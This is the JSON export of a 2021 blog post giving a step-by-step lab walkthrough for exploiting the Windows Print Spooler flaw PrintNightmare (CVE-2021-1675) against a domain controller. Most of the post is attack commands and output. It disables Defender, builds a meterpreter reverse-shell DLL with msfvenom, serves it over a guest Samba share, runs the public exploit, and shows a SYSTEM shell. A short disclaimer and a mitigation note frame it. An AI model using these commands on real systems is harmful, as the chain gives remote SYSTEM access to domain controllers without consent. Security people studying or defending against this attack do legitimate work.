{"id":1135,"date":"2021-07-01T22:27:26","date_gmt":"2021-07-01T14:27:26","guid":{"rendered":"\/?p=1135"},"modified":"2021-07-01T22:27:26","modified_gmt":"2021-07-01T14:27:26","slug":"printnightmare-cve-2021-1675-poc","status":"publish","type":"post","link":"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/","title":{"rendered":"PrintNightmare Privilege Escalation CVE-2021-1675 PoC"},"content":{"rendered":"

OK so this one is doing the rounds on Twitter. A couple of researchers accidently released their code for a vulnerability in the Windows Printer Spooler service. This same service was hit with Stuxnet many moons ago. The vulnerability is a 0day, as the patch that was supposed to fix it does not at the current time of writing this article. Windows 8 and above are impacted by this bug<\/a>. The vulnerability allows for local and remote privilege escalation. If you do a search on Github for ‘CVE-2021-1675’ you will find a bunch of remote and local public exploits.<\/p>\n

Now, on to the Lab!<\/p>\n

Prerequisites<\/strong>
\nDisclaimer: this is a test lab environment, not production. Never run exploits or mess with production environments without explicit permission.
\n1. Setup a Virtual Machine environment. I am using VMware Workstation.
\n2. Setup 1 x Windows 2019 DC VM and 1 x Kali Linux VM,
\n3. Create a domain user on the DC and make sure its password is set (not flagged for change at login).
\n4. For the sake of this Lab, disable Windows Defender. Obfuscating and bypassing AV is out of scope for the payload in this exercise.
\n5. On the 2019 DC enable guest logins for SMB. This is in lieu of setting up a member server to host your payload dll \/ modifying the exploit to connect to a share with a password etc.
\nTo enable guest SMB:
\nstart > run > gpedit.msc. Computer Configuration > Administrative Templates > Network > Lanman Workstation > Enable insecure guest logons.<\/code><\/p>\n

Method<\/strong>
\n1. Download the python exploit from cube0x0’s Github<\/a>
\n2. Install the impacket forked version:
\ngit clone https:\/\/github.com\/cube0x0\/impacket
\ncd impacket
\npython3 .\/setup.py install<\/code>
\n3. From Kali Terminal generate the payload with msfvenom
\nmsfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=10.1.1.10 LPORT=4444 -f dll > shell-cmd.dll<\/code>
\nNow move the dll to the tmp:
\ncp .\/shell-cmd.dll \/tmp<\/code>
\n4. Setup your smb share:
\nEdit your \/etc\/samba\/smb.conf to be:
\n[global]\n map to guest = Bad User
\n server role = standalone server
\n usershare allow guests = yes
\n idmap config * : backend = tdb
\n smb ports = 445<\/p>\n[smb]\n comment = Samba
\n path = \/tmp\/
\n guest ok = yes
\n read only = no
\n browsable = yes
\n force user = smbuser<\/code>
\n5. Add a local user named smbuser and add it to samba:
\nsudo useradd smbuser
\nsudo smbpasswd -a smbuser<\/code>
\n6. Now setup the metasploit listener. You can use revshells.com<\/a> to generate these:
\nmsfconsole -q -x \"use multi\/handler; set payload windows\/x64\/meterpreter\/reverse_tcp; set lhost 10.1.1.10; set lport 4444; exploit\"<\/code>
\n7. Run the exploit:
\nkali@kali:~\/impacket$ .\/CVE-2021-1675.py domain.local\/dummy:Testing12345@10.1.1.1 '\\\\10.1.1.10\\smb\\shell-cmd.dll'<\/code>
\n\"Impacket\"<\/a>
\n8. Check back to your metasploit listener:
\nmsf5 exploit(multi\/handler) > run<\/p>\n[*] Started reverse TCP handler on 10.1.1.10:4444
\n[*] Sending stage (201283 bytes) to 10.1.1.1
\n[*] Meterpreter session 7 opened (10.1.1.10:4444 -> 10.1.1.1:65128) at 2021-07-01 08:42:15 -0400<\/p>\n

meterpreter > shell
\nProcess 5324 created.
\nChannel 1 created.
\nMicrosoft Windows [Version 10.0.17763.1282]\n(c) 2018 Microsoft Corporation. All rights reserved.
\nC:\\Windows\\system32>whoami
\nwhoami
\nnt authority\\system
\nC:\\Windows\\system32>exit
\nexit<\/code>
\n\"Exploit\"<\/a>
\nNotes<\/strong>
\nI found that after the meterpreter session closed, the Spooler service on the DC would crash. Simply start it again from services.msc on the DC.
\nThe exploit has multiple stages and retries. In my lab it worked on the first one and then reported failure on the second. Meterpreter shell had already connected though \ud83d\ude42
\nCurrent mitigation centres around disabling Printer Spooler service on all domain PC’s until the patch is out.<\/p>\n","protected":false},"excerpt":{"rendered":"

OK so this one is doing the rounds on Twitter. A couple of researchers accidently released their code for a vulnerability in the Windows Printer…<\/p>\n","protected":false},"author":2,"featured_media":1145,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22,10],"tags":[56,90,108,147,156,203],"class_list":["post-1135","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-attack","category-security","tag-attack","tag-dll","tag-hacking","tag-printnightmare","tag-rce","tag-windows"],"acf":[],"yoast_head":"\nPrintNightmare Privilege Escalation CVE-2021-1675 PoC - Insecure Wire<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"PrintNightmare Privilege Escalation CVE-2021-1675 PoC - Insecure Wire\" \/>\n<meta property=\"og:description\" content=\"OK so this one is doing the rounds on Twitter. A couple of researchers accidently released their code for a vulnerability in the Windows Printer...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/\" \/>\n<meta property=\"og:site_name\" content=\"Insecure Wire\" \/>\n<meta property=\"article:published_time\" content=\"2021-07-01T14:27:26+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/07\/skull.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"1200\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"nikonau\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@https:\/\/twitter.com\/insecurewire\" \/>\n<meta name=\"twitter:site\" content=\"@insecurewire\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"nikonau\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/\"},\"author\":{\"name\":\"nikonau\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d\"},\"headline\":\"PrintNightmare Privilege Escalation CVE-2021-1675 PoC\",\"datePublished\":\"2021-07-01T14:27:26+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/\"},\"wordCount\":382,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/www.insecurewi.re\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/07\/skull.jpg\",\"keywords\":[\"Attack\",\"DLL\",\"Hacking\",\"PrintNightmare\",\"RCE\",\"Windows\"],\"articleSection\":[\"Attack\",\"Security\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/\",\"url\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/\",\"name\":\"PrintNightmare Privilege Escalation CVE-2021-1675 PoC - Insecure Wire\",\"isPartOf\":{\"@id\":\"https:\/\/www.insecurewi.re\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/07\/skull.jpg\",\"datePublished\":\"2021-07-01T14:27:26+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/#primaryimage\",\"url\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/07\/skull.jpg\",\"contentUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/07\/skull.jpg\",\"width\":1920,\"height\":1200,\"caption\":\"Skull\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.insecurewi.re\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"PrintNightmare Privilege Escalation CVE-2021-1675 PoC\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.insecurewi.re\/#website\",\"url\":\"https:\/\/www.insecurewi.re\/\",\"name\":\"Insecure Wire\",\"description\":\"A Network Engineer\u2019s Perspective.\",\"publisher\":{\"@id\":\"https:\/\/www.insecurewi.re\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.insecurewi.re\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.insecurewi.re\/#organization\",\"name\":\"Insecure Wire\",\"url\":\"https:\/\/www.insecurewi.re\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png\",\"contentUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png\",\"width\":32,\"height\":32,\"caption\":\"Insecure Wire\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/insecurewire\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d\",\"name\":\"nikonau\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g\",\"caption\":\"nikonau\"},\"sameAs\":[\"https:\/\/x.com\/https:\/\/twitter.com\/insecurewire\"],\"url\":\"https:\/\/www.insecurewi.re\/index.php\/author\/nikon\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"PrintNightmare Privilege Escalation CVE-2021-1675 PoC - Insecure Wire","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/","og_locale":"en_US","og_type":"article","og_title":"PrintNightmare Privilege Escalation CVE-2021-1675 PoC - Insecure Wire","og_description":"OK so this one is doing the rounds on Twitter. A couple of researchers accidently released their code for a vulnerability in the Windows Printer...","og_url":"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/","og_site_name":"Insecure Wire","article_published_time":"2021-07-01T14:27:26+00:00","og_image":[{"width":1920,"height":1200,"url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/07\/skull.jpg","type":"image\/jpeg"}],"author":"nikonau","twitter_card":"summary_large_image","twitter_creator":"@https:\/\/twitter.com\/insecurewire","twitter_site":"@insecurewire","twitter_misc":{"Written by":"nikonau","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/#article","isPartOf":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/"},"author":{"name":"nikonau","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d"},"headline":"PrintNightmare Privilege Escalation CVE-2021-1675 PoC","datePublished":"2021-07-01T14:27:26+00:00","mainEntityOfPage":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/"},"wordCount":382,"commentCount":0,"publisher":{"@id":"https:\/\/www.insecurewi.re\/#organization"},"image":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/#primaryimage"},"thumbnailUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/07\/skull.jpg","keywords":["Attack","DLL","Hacking","PrintNightmare","RCE","Windows"],"articleSection":["Attack","Security"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/","url":"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/","name":"PrintNightmare Privilege Escalation CVE-2021-1675 PoC - Insecure Wire","isPartOf":{"@id":"https:\/\/www.insecurewi.re\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/#primaryimage"},"image":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/#primaryimage"},"thumbnailUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/07\/skull.jpg","datePublished":"2021-07-01T14:27:26+00:00","breadcrumb":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/#primaryimage","url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/07\/skull.jpg","contentUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/07\/skull.jpg","width":1920,"height":1200,"caption":"Skull"},{"@type":"BreadcrumbList","@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/07\/01\/printnightmare-cve-2021-1675-poc\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.insecurewi.re\/"},{"@type":"ListItem","position":2,"name":"PrintNightmare Privilege Escalation CVE-2021-1675 PoC"}]},{"@type":"WebSite","@id":"https:\/\/www.insecurewi.re\/#website","url":"https:\/\/www.insecurewi.re\/","name":"Insecure Wire","description":"A Network Engineer\u2019s Perspective.","publisher":{"@id":"https:\/\/www.insecurewi.re\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.insecurewi.re\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.insecurewi.re\/#organization","name":"Insecure Wire","url":"https:\/\/www.insecurewi.re\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/","url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png","contentUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png","width":32,"height":32,"caption":"Insecure Wire"},"image":{"@id":"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/insecurewire"]},{"@type":"Person","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d","name":"nikonau","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g","caption":"nikonau"},"sameAs":["https:\/\/x.com\/https:\/\/twitter.com\/insecurewire"],"url":"https:\/\/www.insecurewi.re\/index.php\/author\/nikon\/"}]}},"_links":{"self":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts\/1135","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/comments?post=1135"}],"version-history":[{"count":0,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts\/1135\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/media\/1145"}],"wp:attachment":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/media?parent=1135"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/categories?post=1135"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/tags?post=1135"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}